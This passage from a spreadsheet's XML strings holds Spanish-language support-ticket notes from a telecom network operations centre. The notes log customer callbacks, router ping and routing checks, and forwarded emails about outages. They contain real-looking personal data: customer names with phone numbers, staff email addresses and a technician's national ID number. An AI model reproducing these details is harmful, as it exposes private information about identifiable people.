SE VALIDA SIN CONEXION ENTRE CTC Y ROUTER, POSIBLEMENTE CABLE DESCONECTADO, FLOJO ENTRE LOS EQUIPOS O ROUTER APAGADO.-</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON SELVIN TRUJILLO/PR 58278836 INDICA QUE YA HIZO SUS REVISIONES INTERNAS, EL PROBLEMA PERSISTE, SE LE PIDE APOYO PARA VALIDAR LO DICHO, PIDE SE LE LLAME EN UNA HORA PARA SEGUIMIENTO.</t>
  </si>
  <si>
    <t>F4583584</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  GUADALUPE AL  98464813 NO RESPONDE ENVIA DIRECTO A BUZON || SE INTENTARA LUEGO **
ID 3001129808
**</t>
  </si>
  <si>
    <t>F4583585</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MANUELA DEL AGUILA AL 56310251 / 40672908 EN EL PRIMER NUMERO NO RESPONDE Y EL SEGUNDO INIDCAN QUE ES NUMERO EQUIVOCADO **
ID 3001130531 - 3001131084
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MANUELA DEL AGUILA 56310251 SE LE MENCIONA QUE A NIVEL DE CLARO EL SERVICIO ESTA FUNCIONANDO DE MANERA CORRECTA, CLIENTE MENCIONA QUE VA ESCALAR CN SU IT
-ID 3001272557</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MANUELA DEL AGUILA AL 56310251 NO RESPONDE ENVIA A BUZON **
ID 3001155346
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MANUELA DEL AGUILA 56310251 MENCIONA QUE YA NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA A LAS 7:00 HRS
-ID 3001185508</t>
  </si>
  <si>
    <t>CLIENTE PR FUERA DE HORARIO LABORAL; PIDE SE CONTINÚE SEGUIMIENTO DEL TICKET HASTA MAÑANA A LAS 07:00AM</t>
  </si>
  <si>
    <t>F4583586</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  CARLOS GODINEZ  AL  40713166 NO RESPONDE ENVIA A BUZON **
SE INTENTARA LUEGO **
ID 3001132809</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  CARLOS GODINEZ  AL  40713166 CLIENTE SOLICITA QUE SE LE LLAME MAÑANA A MEDIO DIA  **
ID 3001153267
**</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CLIENTE PIDE SE MANTENGA EN MONITOREO HASTA MAÑANA A LAS 12:00PM (MEDIODÍA)</t>
  </si>
  <si>
    <t>F4583592</t>
  </si>
  <si>
    <t>SE DOCUMENTA PARA PODER VALIDAR EL SERIVICIO OPERATIVO A NIVEL WAN
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
PING HACIA ROUTER CPE:
PING VRF VPN_DHL-INT_0 187.128.48.194
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 187.128.48.194, TIMEOUT IS 2 SECONDS:
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 1/1/4 MS
RUTA IP:
PE: 10.192.9.67
SHOW IP ROUTE VRF VPN_DHL-INT_0 187.128.48.194
ROUTING TABLE: VPN_DHL-INT_0
ROUTING ENTRY FOR 187.128.48.192/30
  KNOWN VIA "CONNECTED", DISTANCE 0, METRIC 0 (CONNECTED, VIA INTERFACE)
  REDISTRIBUTING VIA BGP 14754
  ADVERTISED BY BGP 14754 ROUTE-MAP VPN-INT
  ROUTING DESCRIPTOR BLOCKS:
  * DIRECTLY CONNECTED, VIA BDI702
      ROUTE METRIC IS 0, TRAFFIC SHARE COUNT IS 1</t>
  </si>
  <si>
    <t>***--  SE REENVIAN PRUEBAS A CL --+**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MARTES, 31 DE MAYO DE 2022 05:59
PARA: MONTIEL FLORES ERICK DANIEL &lt;EMONTIEL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GARCIA GARCIA ROBERTO_26925739 &lt;GGARCIAR@UNINET.COM.MX&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0001221108OC::: TICKET CNOC IMDHE020540 ::: LINK DOWN
ESTIMADO SR. MONTIEL, ADJUNTO CORREO DONDE SE COMPARTEN PRUEBAS ACTUALES.
                PING VRF VPN_DHL-INT_0 187.128.48.194
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 187.128.48.194, TIMEOUT IS 2 SECONDS:
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 1/1/4 MS
SALUDOS.</t>
  </si>
  <si>
    <t>***--- SE RECIBE CORREO DE CL EN NUEVA COLA INDICANDO QUE EL SERVICIO SE ENCUENTRA CAIDO ---*
DE: MONTIEL FLORES ERICK DANIEL [MAILTO:EMONTIEL@UNINET.COM.MX]
ENVIADO EL: MARTES, 31 DE MAYO DE 2022 05:33
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GARCIA GARCIA ROBERTO_26925739 &lt;GGARCIAR@UNINET.COM.MX&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0001221108OC::: TICKET CNOC IMDHE020540 ::: LINK DOWN
VEMOS EL ENLACE CAÍDO, FAVOR DE LEVANTAR TICKET INDEPENDIENTE.
-BASH-4.2$ PING 187.128.48.158
PING 187.128.48.158 (187.128.48.158) 56(84) BYTES OF DATA.
^C
--- 187.128.48.158 PING STATISTICS ---
2 PACKETS TRANSMITTED, 0 RECEIVED, 100% PACKET LOSS, TIME 999MS</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 30 DE MAYO DE 2022 17:49
PARA: JHONNSER JEHONADAS ESCOBAR LUCERO &lt;JHONNSER.ESCOBAR@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; RAMOS LERIZTA ILIANA &lt;IRLERIZT@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0001221108OC ::: TICKET CNOC IMDHE020528 ::: "SERVICIO FUERA"
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 RESPONDEN PERO CORTAN LA LLAMADA, SE INTENTARA LUEGO
-ID 3001193805</t>
  </si>
  <si>
    <t>F4583593</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BRYAN LOPEZ AL 42216051   INDICA QUE ESTAN REALIZANDO PRUEBAS SOLICITA QUE SE LE LLAME EN 30 MIN NUEVAMENTE **
ID 3001134845
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRYAN LOPEZ 42216051 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001196549</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRYAN LOPEZ 42216051  NO RESPONDE, SE INTENTARA LUEGO
-ID 3001167217</t>
  </si>
  <si>
    <t>F4583595</t>
  </si>
  <si>
    <t>SE CONVERSA CON EJECUTIVO NAUN HERNANDEZ, INDICA QUE EL CLIENTE ESTA SOLVENTE DESDE LA SEMANA PASADA Y QUE SE LE LLAME  A LAS 16:30 HORAS PARA SEGUIMIENTO DEL CASO.
3001108369
COLA:
NOMBRE: A: 0050433330101
NÚMERO: 0050433330101
DURACIÓN: 0:02:41
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050433330101
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 30/05/2022 14:49:53</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SINDY, INSISTE EN QUE EL PAGO NO ES INCONVENIENTE POR LO QUE PROPORCIONA CONTACTO DE EJECUTIVO DE CUENTA  33330101 NAUN HERNANDEZ PARA QUE SE LE CONTACTE Y SE CONFIRME
3001106151
COLA:
NOMBRE: A: 0050494472412
NÚMERO: 0050494472412
DURACIÓN: 0:04:02
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050494472412
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 30/05/2022 14:46:08</t>
  </si>
  <si>
    <t>SE VALIDA INTERFAZ VLAN 1 APAGADA ADMIN, CLIENTE INDICA QUE LA SEMANA PASADA SE SOLVENTO EL INCONVENIENTE CON PAGO Y PROPORCIONA NUMERO DE CONTRATO 922120, SE INDAGARA LA CAUSA POR LA QUE LA VLAN SE ENCUENTRA APAGADA.
3001099341
COLA:
NOMBRE: A: 0050494472412
NÚMERO: 0050494472412
DURACIÓN: 0:06:53
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050494472412
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 30/05/2022 14:26:43</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE DANIEL MARTINEZ EN LINEA, VALIDANDO EL SERVICIO
3001099341
COLA:
NOMBRE: A: 0050494472412
NÚMERO: 0050494472412
DURACIÓN: 0:02:44
ESTADO: CONECTADA
DETALLES: 0050494472412
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 30/05/2022 14:21:23</t>
  </si>
  <si>
    <t>F4583629</t>
  </si>
  <si>
    <t>58262155 ELMER COLLADO ESTA EN TRASLADO A PUNTO REMOTO</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 31 DE MAYO DE 2022 9:07
PARA: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; LIGIA.MONTANO@ELDIARIODEHOY.COM &lt;LIGIA.MONTANO@ELDIARIODEHOY.COM&gt;; LORENA.GUADRON@ELDIARIODEHOY.COM &lt;LORENA.GUADRON@ELDIARIODEHOY.COM&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SIN SERVICIO || IP2204078SV || EDITORIAL ALTAMIRANO MADRIZ S.A. DE C.V. || SAN MIGUELCTRO. COM. METROCENTROAVENIDA ROOSEVELT37KIOSKO 37 FTE.BACNO DAVIVIENDA
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4583636</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE  NILBA  GARCIA PERO NO CONTESTA.
3001110665, 3001110817
COLA:
NOMBRE: A: 52549688
NÚMERO: 52549688
DURACIÓN: 0:00:04
ESTADO: MARCANDO
DETALLES: 52549688
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 30/05/2022 14:54:02</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE  NILBA  GARCIA, PARA INDICARLE QUE EL SERVICIO ESTA ACTIVO PERO QUE ES NECESARIO REINCIAR LA PBX.
CLIENTE INDICA QUE VA A SOLICITAR SOPORTE Y SOLICITA QUE SE LE LLAME EN 20MIN.
3001101670
COLA:
NOMBRE: A: 52549688
NÚMERO: 52549688
DURACIÓN: 0:00:17
ESTADO: CONECTADA
DETALLES: 52549688
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 30/05/2022 14:26:10</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
SE SOLICITA HABLAR CON EL CLIENTE NILBA GARCIA. QUIEN INDICA QUE ESTA EN UNA REUNION.
3001110897
COLA:
NOMBRE: A: 22778300
NÚMERO: 22778300
DURACIÓN: 0:00:15
ESTADO: CONECTADA
DETALLES: 22778300
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 30/05/2022 14:55:11</t>
  </si>
  <si>
    <t>F4583640</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRISTIAN HIGUEROS AL 41020434 INDICA QUE NO SE ENCUENTRA EN OFICINA SOLICITA QUE SE LE LLAME A LAS 16:00 HRS PARA QUE SE PUEDAN REALIZAR LAS PRUEBAS**
ID 3001275484
**</t>
  </si>
  <si>
    <t>F4583642</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ISAAC JUAREZ 40063018 MENCIONA QUE YA NO VOLVIO A PRESENTAR INCONVENIENTE
-ID 3001473356</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ISAAC JUAREZ 40063018 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001462886</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ISAAC JUAREZ 40063018 MENCIONA QUE ESTARA REALIZANDO PRUEBAS POR LO QUE SOLICITA LLAMADA PARA MAÑANA A LAS 14:00 HRS
-ID 3001197312</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CLIENTE PIDE SE LE LLAME MAÑANA A LAS 14:00 HORAS PARA SEGUIMIENTO Y/O VALIDAR SERVICIO.</t>
  </si>
  <si>
    <t>F4583643</t>
  </si>
  <si>
    <t>SE LLAMA A TEC LUIS PARA INFORMARLE QUE NO HAY EVENTOS EN EL PUERTO DE MSAN, COMENTA QUE SE CAMBIO EL PAR PRIMARIO PERO SIGUE EN LAS MISMAS POSICIONES.
##SE DETIENE TIMEPO DE ESCALACION
##SE DA CODIGO DE CIERRE
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANDRE GARCIA 56955952 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001396540</t>
  </si>
  <si>
    <t>F4583691</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KATHERINE HERNÁNDEZ 32889109 MENCIONA QUE ESTARA VALIDANDO CON PR POR LO QUE SOLICITA LLAMADA EN 5 MIN
-ID 3001374516</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KATHERINE HERNÁNDEZ 32889109 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001376966</t>
  </si>
  <si>
    <t>F4583694</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: LUNES, 30 DE MAYO DE 2022 15:26PARA: USCTELECOMUNICACIONES@ICASA.COM.GT &lt;USCTELECOMUNICACIONES@ICASA.COM.GT&gt;; TELECOMUNICACIONES VPC &lt;TELECOMVPC@ICASA.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_PRONE_GT_14_AVENIDA_ZONA1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3694
ID: 97100280T
IDENTIFICADOR DEL CLIENTE:  CC_PRONE_GT_14_AVENIDA_ZONA13
UBICADO EN:  14 AVENIDA 29-32 ZONA 13
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4583700</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON ESTUARDO SAQUICH/CLIENTE 59519771 INDICA QUE YA ENVIÓ EL CORREO A SU EQUIPO INTERNO PARA LOS PERMISOS, ÉSTOS LO VERÁN MAÑANA A LAS 08:00AM, AL TENER LOS DATOS SOLICITADOS, NOS ENVIARÁ LA INFORMACIÓN POR LA MISMA VÍA.
SE PIDE A CNOC CLARO VÍA SKYPE QUE NOS INCLUYAN EN LA COLA DE CORREO.</t>
  </si>
  <si>
    <t>|| SE ENVIA CORREO A CREDOMATIC SOLICITANDO VISITA PARA MAÑANA 9 AM || PENDIENTE CONFIRMEN
ERITO FERNANDO TECU XITUMUL
ASUNTO: VISITA TÉCNICA ID: 17400263T || CREDOMATIC GUATEMALA, S.A. || KM 94.5 INTERIOR INGENIO MADRE TIERRA CAMINO A MAZATENANGO STA LUCIA COTZ
BUENA TARDE ESTIMADOS CREDOMATIC.
EN SEGUIMIENTO AL SERVICIO REPORTADO ID: 17400263T || CREDOMATIC  GUATEMALA, S.A. || KM 94.5 INTERIOR INGENIO MADRE TIERRA CAMINO A MAZATENANGO STA LUCIA COTZ.
SOLICITAMOS NOS PUEDAN APOYAR EN GESTIONAR VISITA EN CONJUNTO PARA APERTURA DE ATM EL DÍA DE MAÑANA MARTES 30/05 A PARTIR DE LAS 9:00 HRS.
ADJUNTO LOS DATOS DE PERSONAL TÉCNICO ASIGNADO
AXEL DANILO ZARPEC SAZO IBM: 796395 DPI: 1624-52527-0501</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE BAC, INDICANDO QUE PROCEDERAN CON GESTIONAR ACCESOS Y QUE RESPONDERAN LUEGO CON EL HORARIO Y FECHA PARA PROCEDER
FELIPE ESTUARDO SAQUICH COYOY &lt;FESAQUICH@BACCREDOMATIC.GT&gt;
ASUNTO: VISITA TÉCNICA ID: 17400263T || CREDOMATIC GUATEMALA, S.A. || KM 94.5 INTERIOR INGENIO MADRE TIERRA CAMINO A MAZATENANGO STA LUCIA COTZ
ESTIMADO ERITO,
GRACIAS POR LA INFORMACIÓN.  SE ESTÁ TRAMITANDO EL PERMISO. CUANDO ESTÉ AUTORIZADO, LES INFORMAREMOS LA HORA DE LA VISITA.
 SALUDOS,</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ESTUARDO SAQUICH  AL 59519771 INDICA QUE NO SE ENCUENTRA EN EL PR QUE PARA REALIZAR PRUEBAS SE TIENE QUE PROGRAMAR UNA VISITA ADICIONAL COMENTA QUE SI CUENTAN CON ENERGIA || SE NOTIFICA A GESTOR
ID 3001149032
**</t>
  </si>
  <si>
    <t>F4583701</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE ESTUARDO GONZALES QUIEN INDICA QUE NO TENIAN SERVICIO PERO DESPUES SE REESTABLECIO. POSIBLMENTE PROBLEMA CON LA ENERGIA COMERCIAL. CLIENTE AUTORIZA EL CIERRE.
3001129245
COLA:
NOMBRE: A: 23822500
NÚMERO: 23822500
DURACIÓN: 0:00:37
ESTADO: CONECTADA
DETALLES: 23822500
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 30/05/2022 15:52:46</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE ESTUARDO GONZALES PERO NO CONTESTA. ES NECESARIO QUE INDIQUE CUAL ES LA AFECTACION QUE TIENEN.
3001126079, 3001126312
COLA:
NOMBRE: A: 36815425
NÚMERO: 36815425
DURACIÓN: 0:00:31
ESTADO: CONECTADA
DETALLES: 36815425
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 30/05/2022 15:42:31</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
SE SOLICITA HABLAR CON EL CLIENTE ESTUARDO GONZALES.
3001122008
COLA:
NOMBRE: A: 23822500
NÚMERO: 23822500
DURACIÓN: 0:00:09
ESTADO: CONECTADA
DETALLES: 23822500
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 30/05/2022 15:29:27</t>
  </si>
  <si>
    <t>F4583702</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE CON RFO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 1 DE JUNIO DE 2022 16:01
PARA: MARCOS.MONTES@SV.NESTLE.COM &lt;MARCOS.MONTES@SV.NESTLE.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;
ASUNTO: SOLICITUD DE DICTAMEN TÉCNICO || NESTLE EL SALVADOR S.A. || IDG000551SV
BUENA TARDE
  EN SEGUIMIENTO AL TICKET SD1126891 SE REALIZA LA ENTREGA DE DICTAMEN TÉCNICO.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA LA ELABORACION DE RFO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 30 DE MAYO DE 2022 18:07
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;; HUGO ALEJANDRO JUAREZ LOPEZ &lt;HUGOA.JUAREZ@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; WAGNER JOSUE POLANCO SANDOVAL &lt;WAGNER.POLANCO@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE RFO || NESTLE EL SALVADOR S.A. DE C.V. || F4583702
BUENA TARDE
SOLICITO DE SU APOYO CON LA ELABORACIÓN DE DICTAMEN TÉCNICO CON LOS SIGUIENTES DATOS:
EMPRESA 	ID 	TICKET
NESTLE EL SALVADOR S.A. DE C.V.
IDG000551SV
SD1126891
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4583733</t>
  </si>
  <si>
    <t>SE DESCARTAN PERDIDAS HACIE EQUIPO WIMAX CLIENTE
&lt;HUEHGTHUN1T1A07A02EIM1&gt;PING -C 500 -M 30 -S 1500 -B -VPN-INSTANCE ADMIN_WIMAX_ISLAS 10.16.167.152
  PING 10.16.167.152: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.16.167.152 PING STATISTICS ---
    500 PACKET(S) TRANSMITTED
    500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 25/48/66 MS
&lt;HUEHGTHUN1T1A07A02EIM1&gt;</t>
  </si>
  <si>
    <t>F4583740</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRITA. OTILIA ROSALES AL 97520047  INIDCA QUE EL PROBLEMA QUE PRESENTA ES QUE NO LE IMPRIME FACTURAS  || SE NOTIFICA A GESTOR   **
ID 3001265777
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRITA. OTILIA ROSALES AL 97520047 NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001256563
**</t>
  </si>
  <si>
    <t>F4583743</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DAVID RECINOS 30124582 MENCIONA QUE EL INCONVENIENTE ES QUE NO LLEGAN AL ANCHO DE BANDA CONTRATADO (8MBPS)
-ID 3001131718</t>
  </si>
  <si>
    <t>F4583760</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: LUNES, 30 DE MAYO DE 2022 16:13PARA: MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE PRINCIPAL CAIDO PARA CLIENTE "CC_TYT_GT_ATM288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3760
ID: 47502143T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM2885
UBICADO EN:  FARMACIA GALENO, 3 C. 0-82 ZONA 2 PALIN ESCUINTLA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA A MONITOREO 5B ATIENDE DANIEL COMENTA QUE ENVIARA A SUPERVISOR A PUNTO REMOTO A VERIFICAR EQUIPOS ESTO SE REALIZARA EL DÍA DE MAÑANA.
3001173475
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:01:49
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 30/05/2022 17:14:41</t>
  </si>
  <si>
    <t>F4583774</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE CARLOS GODINEZ, INDICA QUE ESTARA REALIZANDO PRUEBAS Y QUE SE LE LLAME EL DIA DE MAÑANA A PARTIR DE LAS 13:00 HORAS.
3001154029
COLA:
NOMBRE: A: 40713166
NÚMERO: 011 50240713166
DURACIÓN: 0:02:17
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: +50240713166
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 30/05/2022 16:48:51</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS GODINEZ 40713166 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001810685 - 1001810941</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CLIENTE HARÁ SUS PRUEBAS INTERNAS, SEGUIMIENTO PARA MAÑANA A LAS 13:00 HORAS.</t>
  </si>
  <si>
    <t>F4583780</t>
  </si>
  <si>
    <t>GESTIÓN AE INDICA ENLACE OK, CLIENTE PIDE SE VALIDE SERVICIO MAÑANA A LAS 08:00AM</t>
  </si>
  <si>
    <t>CLIENTE LUIS MORALES 52001303 INDICA QUE EL SERVICIO HA PRESENADO LA FALLA VARIAS VECES POR LO QUE SOLICITA SE DEJE EN OBSERVACIÓN Y VALIDAR AL MEDIO DIA. ID DE LLAMADA: 3001259662</t>
  </si>
  <si>
    <t>CLIENTE LUIS MORALES 52001303  VALIDA EL SERVICIO OPERATIVO, SE LE EXPLICA QUE EL EQUIPO QUE PIERDE EL REGISTRO ES EL EQUIPO AETHRA Y NO LA PBX. AUTORIZA EL CIERRE DEL CASO.
RESULTADO: LLAMADA HECHA
NOMBRE: 52001303
NÚMERO: 52001303
INICIO: HOY, 12:37 P. M.
FIN: HOY, 12:48 P. M.
DURACIÓN: 11:01
ID DE LLAMADA: 3001364134</t>
  </si>
  <si>
